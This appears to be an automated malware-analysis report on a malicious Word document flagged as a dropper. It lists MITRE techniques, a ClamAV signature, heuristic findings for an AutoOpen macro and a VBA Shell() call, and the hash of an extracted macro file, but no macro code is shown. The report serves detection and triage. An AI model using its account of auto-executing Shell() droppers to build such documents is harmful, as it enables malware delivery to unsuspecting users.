Risk Score: 242 (MALICIOUS)

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro calls the Shell() function, a common way to execute arbitrary commands. The macro's obfuscation and the presence of the Shell() call strongly suggest it is designed to download and execute a secondary payload, consistent with dropper malware behavior. The ClamAV detection further supports its malicious classification.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6447493-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6447493-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27928 bytes |

SHA-256: e94015899c119c389291fb84354016b4e981560da34538f413c151b9bece66d0

Preview script: first 1,000 lines of the extracted script.